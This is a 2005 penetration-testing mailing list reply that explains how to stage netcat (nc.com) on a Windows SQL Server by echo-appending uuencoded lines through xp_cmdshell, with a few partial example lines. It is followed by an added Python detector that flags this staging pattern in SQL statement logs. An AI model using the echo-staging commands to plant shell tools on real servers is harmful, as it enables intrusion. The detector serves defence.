Penetration Testing mailing list archives

Re: TFTP and XP_CMDSHELL - Weird


From: Javier Fernandez-Sanguino <jfernandez () germinus com>
Date: Thu, 23 Jun 2005 19:24:02 +0200

Andres Molinetti wrote:

I think the problem is the tftp client. Does anyone know if MS has fixed it in any way not to allow downloads from low-privileged users? Or something like that?

Why use tftp? You can just create a uuencode file that will auto-decode itself when run. Try using

xp_cmdshell 'echo begin 666 nc.com >>c:\nc.com'
xp_cmdshell 'echo M6%!04%E:25%$6TPM9C8M9S0Q1T136'4G0"Q^4%Y07T\L(2A'52A'6BA';G4U >>c:\nc.com'
xp_cmdshell 'echo M+4Y%5%-%3D1?5C$N,#!?2E)4/0T*0T9&1E)8+&`L8#(D1CU`(70N<E$P)4EU >>c:\nc.com'
(...)

and so on. I'll leave the rest up to you. There are some caveats when you want to pull that through HTTP but it works every time.

Regards

Javier
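
For defenders reviewing SQL Server statement logs, the echo-append staging described in the message above leaves a recognizable trace: a `begin <mode> <name>` header and a run of well-formed uuencoded lines appended to one file. The detector below is an added example, not part of the original post; the input format (one captured SQL statement per string), the paths, and the `min_body` threshold are assumptions.

```python
import binascii
import re
from collections import defaultdict

# xp_cmdshell 'echo <data> >><path>' : one append per statement, as in the post
ECHO_APPEND = re.compile(
    r"xp_cmdshell\s+N?'\s*echo\s+(?P<data>.*)>>\s*(?P<path>[^'\s]+)\s*'\s*;?\s*$",
    re.IGNORECASE)
UU_BEGIN = re.compile(r"^begin\s+[0-7]{3,4}\s+(?P<name>\S+)$")

def is_uu_body(s):
    """True if s is a well-formed uuencoded data line (length char + payload)."""
    if not s or any(not 0x20 <= ord(c) <= 0x60 for c in s):
        return False
    n = (ord(s[0]) - 0x20) & 0x3F            # decoded byte count for this line
    return n > 0 and len(s) - 1 == 4 * ((n + 2) // 3)

def find_uu_staging(statements, min_body=2):
    """Group echo-append statements by target file; report likely uuencode staging."""
    seen = defaultdict(lambda: {"name": None, "body": 0})
    for stmt in statements:
        m = ECHO_APPEND.search(stmt)
        if not m:
            continue
        data = m["data"].rstrip()            # blanks before >> are dropped
        entry = seen[m["path"].lower()]
        header = UU_BEGIN.match(data)
        if header:
            entry["name"] = header["name"]
        elif is_uu_body(data):
            entry["body"] += 1
    return {p: e for p, e in seen.items() if e["name"] and e["body"] >= min_body}

def sample_statements():
    # Constructed input: 100 harmless bytes uuencoded, plus two unrelated statements.
    path = r"c:\temp\demo.bin"               # hypothetical target path
    blob = bytes(range(100))
    lines = ["begin 666 demo.bin"]
    for i in range(0, len(blob), 45):
        lines.append(binascii.b2a_uu(blob[i:i + 45], backtick=True).decode().rstrip("\n"))
    lines.append("end")
    stmts = [f"EXEC master..xp_cmdshell 'echo {l} >>{path}'" for l in lines]
    stmts.insert(0, "EXEC master..xp_cmdshell 'dir c:\\temp'")
    stmts.append(r"EXEC master..xp_cmdshell 'echo backup finished >>c:\temp\job.log'")
    return stmts

if __name__ == "__main__":
    for path, hit in find_uu_staging(sample_statements()).items():
        print(f"{path}: uuencode header for {hit['name']!r}, {hit['body']} data lines")
```

The length check in `is_uu_body` is what keeps ordinary text such as log messages from counting as encoded data, since the first character of a real uuencoded line must agree with the number of characters that follow it.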

